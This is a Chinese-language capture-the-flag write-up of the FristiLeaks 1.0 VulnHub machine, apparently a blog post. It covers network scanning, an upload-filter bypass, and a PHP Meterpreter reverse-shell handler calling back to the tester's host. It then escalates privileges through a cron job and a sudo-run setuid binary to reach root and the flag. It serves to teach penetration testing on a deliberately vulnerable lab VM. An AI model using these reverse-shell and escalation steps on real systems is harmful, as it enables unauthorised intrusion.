Description:
A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..
NOTE:设置是需要把虚拟机的mac地址改为08:00:27:A5:A6:76 虚拟机打开是这个样子 目标是成为root用户并拿到flag
信息收集 首先是寻找目标机
nmap -sn 192.168.224。
root@kali:~# nmap -sn 192.168.224.0/24
Starting Nmap 7.40 ( https://nmap.org )
Nmap scan report for 192.168.224.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.224.2
Host is up (0.00016s latency).
MAC Address: 00:50:56:FD:70:F2 (VMware)
Nmap scan report for 192.168.224.135
Host is up (0.00016s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.224.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:FB:7A:70 (VMware)
Nmap scan report for 192.168.224.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.71 seconds
发现目标主机在192.168.224.135,对目标主机进行扫描
nmap -sS -sV -T4 -A -O 192.168.224.135
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Starting Nmap 7.40 ( https://nmap.org )
Nmap scan report for 192.168.224.135
Host is up (0.0016s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop
得到的信息是80端口开启,并且是Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3),还有robots.txt
查找突破点 首先浏览web网站
查看robots.txt,进入给出的三个目录,但只得到一张相同的图片
似乎并没有什么用,但是注意到这三个名字都为饮品,而结合首页的keep calm and drink fristi,尝试/fristi
成功得到一个登陆页面! :)查看源代码
看到一段注释,是eezeepz留下的,而之后出现的图片被base64编码,而在后面有一段注释的代码,同样试试base64,解出来是一张似乎是密码的图片
使用eezeepz作为username成功登陆
可以上传文件了
不过进行了简单的过滤,只能上传png,jpg,gif,修改后缀名就能绕过
利用 添加.jpg后缀,上传反向shell,设置监听1
2
3
4
5
6
7
8
9
10
11
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.224.136
lhost => 192.168.224.136
msf exploit(handler) > set lport 445
lport => 445
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.224.136:445
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.224.135
[*] Meterpreter session 1 opened (192.168.224.136:445 -> 192.168.224.135:57657) at 2018-02-14 17:34:28 +0800
1
2
3
4
5
6
7
meterpreter > shell
Process 5305 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/var/www/html/fristi/uploads
文件比较多,一级一级查看,在/var/www 中发现有一个notes.txt
1
2
3
4
5
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
于是去查看home目录中的eezeepz,在里面同样发现了一个notes.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
提示可以使用chmod, df, cat, echo, ps, grep, egrep 命令,并要在/tmp/创建runthis文件,之后会出现cronresult文件,并用他的权限执行
想要去查看admin的内容可以利用chmod 修改权限
1
2
3
4
5
6
7
8
9
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
ls
cronresult
runthis
cat cronresult
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
可以进入admin了
1
2
3
4
5
6
7
8
9
10
11
12
13
cd admin
ls
cat
chmod
cronjob.py
cryptedpass.txt
cryptpass.py
df
echo
egrep
grep
ps
whoisyourgodnow.txt
cryptedpass.txt
cryptpass.py
1
2
3
4
5
6
7
8
9
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
whoisyourgodnow.txt
1
=RFn0AKnlMHMPIzpyuTI0ITG
看来密码是经过一个加密,新base64加密,再用倒序的字符串进行rot13加密
解密分别得到
1
2
thisisalsopw123
LetThereBeFristi!
这可能是另一个用户fristigod 的密码
这里采用su - 切换是出现了问题,提示standard in must be a tty 查找资料可以用python模拟一个虚拟终端解决 python -c ‘import pty;pty.spawn(“/bin/sh”)’ 原因是因为su(还有sudo)命令不是一个简单的进程,出于安全的考虑,linux要求用户必须从终端设备 (tty)中输入密码,而不是标准输入(stdin)。换句话说,sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。因此为了能够输入密码,我们必须模拟一个终端设备。
1
2
3
4
python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.1$ su - fristigod
su - fristigod
Password: LetThereBeFristi!
成功进入fristigod账户
1
2
3
4
5
6
7
8
-bash-4.1$ pwd
pwd
/var/fristigod
-bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
-bash-4.1$ ls
ls
不过也不是root,并且没有东西,-al 试试
1
2
3
4
5
6
7
-bash-4.1$ ls -al
ls -al
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff
1
2
3
4
5
6
7
-bash-4.1$ cd .se
cd .-bash-4.1$ ls -al
ls -al
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
doCom没有权限,查看历史命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
-bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
可见fristigod 大多使用sudo命令,同样试试sudo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
根据提示,尝试
1
2
3
-bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...-bash-4.1$
创建shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fri
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
得到flag,完成
总结 关于Linux中tty、pty、pts
1> tty(终端设备的统称): tty一词源于Teletypes,或teletypewriters,原来指的是电传打字机,是通过串行线用打印机键盘通过阅读和发送信息的东西,后来这东西被键盘和显示器取代,所以现在叫终端比较合适。 终端是一种字符型设备,他有多种类型,通常使用tty来简称各种类型的终端设备。 > pty(虚拟终端): 但是假如我们远程telnet到主机或使用xterm时不也需要一个终端交互么?是的,这就是虚拟终端pty(pseudo-tty) > pts/ptmx(pts/ptmx结合使用,进而实现pty): s(pseudo-terminal slave)是pty的实现方法,和ptmx(pseudo-terminal master)配合使用实现pty。
参考 http://blog.sina.com.cn/s/blog_638ac15c01012e0v.html
https://g0blin.co.uk/fristileaks-1-3-vulnhub-writeup/#-cola-sisi-and-beer
来源
结束:)